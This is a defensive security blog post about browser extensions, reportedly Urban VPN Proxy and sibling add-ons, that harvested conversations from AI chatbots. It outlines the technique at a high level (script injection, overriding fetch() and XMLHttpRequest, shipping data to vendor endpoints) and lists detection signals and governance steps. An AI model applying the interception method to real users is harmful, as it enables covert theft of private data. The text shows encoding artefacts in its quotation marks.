Browser extensions can siphon AI chatbot prompts and responses. Learn how to detect and prevent AI chat data harvesting with endpoint controls and behavioral analytics.

Stop Browser Extensions From Stealing AI Chat Data
8 million users is a lot of âoops.â Thatâs the scale researchers reported for Urban VPN Proxy and related browser extensions that captured and exfiltrated conversations from popular AI assistantsâChatGPT, Claude, Gemini, Copilot, Perplexity, DeepSeek, Grok, and Meta AI.
Most companies get this wrong: they treat AI chatbot usage as a policy problem (âdonât paste secretsâ) when itâs increasingly an endpoint problem. If a browser extension can sit between the user and the chatbot and quietly siphon prompts and responses, training slides wonât save you.
This post breaks down what actually happened, why âmarketplace approvalâ doesnât mean safe, and the controls that reliably reduce riskâespecially AI-driven behavioral analytics that spot unauthorized data harvesting even when itâs âtechnically disclosed.â
What happened: AI chat prompts became an exfiltration stream
The core issue is simple: a âprivacyâ extension behaved like a data collection agent.
Researchers at Koi Security reported that Urban VPN Proxy (and several sibling extensions from the same publisher) collected AI chatbot conversation data by default in newer versions. Crucially, the data collection ran whether the VPN feature was connected or not, and users didnât get a clear in-product control to turn it off.
From a defenderâs viewpoint, this is the nightmare scenario for AI adoption:
- Employees believe theyâre using an AI assistant inside a normal browser session.
- The organization thinks risk is contained to the AI providerâs environment.
- A third party on the endpoint captures the full prompt/response streamâand ships it out.
Why AI chat data is more sensitive than teams assume
AI chatbot transcripts are unusually âdenseâ with sensitive material. People donât just search; they confess.
In enterprise settings, prompts commonly include:
- Proprietary source code, configuration, and architecture diagrams
- Incident details and logs during active investigations
- Credentials pasted âjust for a secondâ to debug
- Customer records, regulated data, or internal financials
- Legal drafts, HR issues, merger plans
The uncomfortable truth: AI chat has become a shadow system of record. If you donât treat it like one, someone else will.
How the extension pulled it off (and why itâs hard to spot)
Answer first: it used a classic interception techniqueâinjecting scripts into specific sitesâand then captured network traffic before the browser rendered it.
According to the researchersâ description, the extension:
- Monitored tabs to detect when a user visited a targeted AI platform.
- Injected an âexecutorâ script tailored for that platform.
- Overrode
fetch()andXMLHttpRequest, the browser APIs that handle web requests. - Captured prompts and responses by intercepting the raw API traffic.
- Packaged and sent the data to remote endpoints associated with the vendor.
This matters because it avoids many naĂŻve âprivacy checks.â A user can review a chat UI and see nothing unusual. Even basic network monitoring may show traffic that looks like analytics. Meanwhile, the extension is effectively acting as a man-in-the-browser.
The signals defenders should care about
If youâre building detection logic (or evaluating tools that claim they can), this kind of behavior tends to generate a few measurable signals:
- Unexpected script injection into known SaaS domains (LLM chat apps)
- API interception patterns (wrapping web APIs, hooking request/response objects)
- Background service worker traffic to analytics/stat endpoints with compressed payloads
- High-frequency outbound calls that correlate with prompt submissions
- Cross-extension âfamily resemblanceâ (same publisher patterns, shared SDKs)
A human canât reliably watch for these. Automation can.
âBut it was in the privacy policyâ isnât a defense
Answer first: buried disclosure doesnât equal informed consent, and it definitely doesnât equal enterprise acceptability.
This incident exposes a gap between platform policy compliance and user expectations. Extensions can pass marketplace review, earn a âfeaturedâ badge, and still engage in data collection that would surprise most usersâespecially when the extension markets itself as privacy protection.
From a governance standpoint, I take a hard stance here: if an extension collects AI chat content, that behavior should be treated as high-risk by default, regardless of whether itâs disclosed.
Why? Because disclosure doesnât change the impact:
- Chat transcripts can contain regulated data.
- The organization may have contractual obligations (confidentiality, DPAs).
- The captured content can be re-identified when combined with device identifiers and clickstream.
If youâre a security leader, this is also a procurement lesson: âfree VPNâ is often a business model, not a gift.
Where AI in cybersecurity fits: detect behavior, not badges
Answer first: the most practical way to stop this class of threat is endpoint monitoring + behavioral analytics, with AI used to flag abnormal data flows and suspicious extension behaviors.
In the âAI in Cybersecurityâ series, we keep coming back to one theme: attackers (and data brokers) thrive in the gaps between tools. Browser extensions live in a gap where:
- EDR may not fully understand browser internals.
- Network controls may see âjust HTTPS.â
- Marketplace trust signals create false confidence.
This is exactly where AI-driven detection helpsâbecause itâs good at correlating weak signals across time.
What AI-driven detection can realistically catch
You donât need magic. You need good telemetry and models that prioritize the right anomalies.
Effective detections often look like:
- Behavioral baselining: âThis userâs browser doesnât normally send compressed payloads to unknown analytics domains right after LLM prompts.â
- Sequence detection: âVisit LLM domain â injection event â hook APIs â background exfil.â That pattern is more meaningful than any single indicator.
- Publisher-level clustering: âMultiple extensions share code paths, endpoints, and permission sets.â
- Content-aware controls (where permitted): identify prompt-like payload structures leaving the endpoint, without storing the content.
AI isnât replacing security controls here. Itâs helping you find the needle faster.
The control stack that works (and whatâs usually missing)
Most organizations already have pieces of thisâbut not connected.
A practical stack looks like:
- Extension governance (prevent the risky install)
- Secure enterprise browser controls (limit what extensions can do)
- Endpoint telemetry + threat hunting (detect injection/exfil behavior)
- Network egress control (block known bad destinations, restrict unknown)
- AI usage guardrails (reduce the sensitivity of whatâs entered)
In my experience, the missing piece is almost always #1. If employees can install whatever they want, everything else becomes cleanup.
A concrete response plan (do this next week, not âsomedayâ)
Answer first: treat browser extensions that touch AI chat as a Tier-1 data risk, then reduce your exposure in three passesâinventory, control, detect.
1) Inventory: know whatâs installed and where
Start with facts. Pull an extension inventory from managed browsers and endpoint tools, and segment by:
- Publisher
- Permissions (especially âread and change data on websites you visitâ)
- Installation source (store vs sideload)
- User population (engineering, finance, support)
If you donât have centralized browser management, this incident is your reason to get it.
2) Control: move to allowlists, not denylists
Denylists are whack-a-mole. Allowlists scale.
Set policy so that:
- Only approved extensions run on corporate profiles.
- VPN/proxy extensions are restricted to vetted vendors.
- AI assistants are accessed through managed browsers or managed profiles.
If you must allow some flexibility, consider a tiered model:
- Tier A: approved and monitored
- Tier B: allowed for low-risk roles only
- Tier C: blocked
3) Detect: watch for âAI chat interceptionâ behaviors
Even with strong governance, assume something slips through.
Detection ideas that consistently pay off:
- Alerts on new extension installs or updates across the fleet
- Alerts on script injection events into known AI chatbot domains
- Outbound connections from browser processes to newly seen analytics/stat domains
- Data volume spikes correlated with chatbot use
- Long-running service worker activity that doesnât match user actions
If youâre evaluating vendors, ask a blunt question: Can your product detect a browser extension overriding fetch() and exfiltrating chatbot API traffic? Show me how.
Common questions security teams are asking (and straight answers)
âDoes a âfeaturedâ marketplace badge mean itâs safe?â
No. Itâs a trust signal, not a security guarantee. Behavior changes after updates; badges donât prevent that.
âIs this only a consumer risk?â
No. Corporate devices are often the target because enterprise prompts are more valuableâsource code, customer data, internal strategies.
âIf we block one extension, are we covered?â
No. The pattern is the risk: extensions that can read/modify site data and intercept requests can be repurposed. You need governance plus detection.
âShould we ban AI chatbots?â
Bans push usage into personal devices and unmanaged browsers. A better approach is managed access + data controls + monitoring.
What this means for 2026 AI security programs
AI chatbot data theft is turning into a mainstream endpoint problem, and attackers donât need zero-days to do it. They just need a distribution channel, a plausible store listing, and a permission set users click through.
If youâre building your 2026 roadmap, Iâd prioritize two outcomes:
- You can prove what browser extensions are running in your environment.
- You can detect and stop abnormal data flows from AI chatbot interactions.
Those two capabilities wonât just prevent this specific incident. Theyâll also harden you against the next wave: agentic workflows in the browser, AI copilots inside business apps, and more sensitive prompts moving through more endpoints.
If a tool claims to protect privacy while quietly shipping AI chat transcripts to third parties, the right response isnât panicâitâs engineering. What would it take in your environment to catch that behavior within hours, not weeks?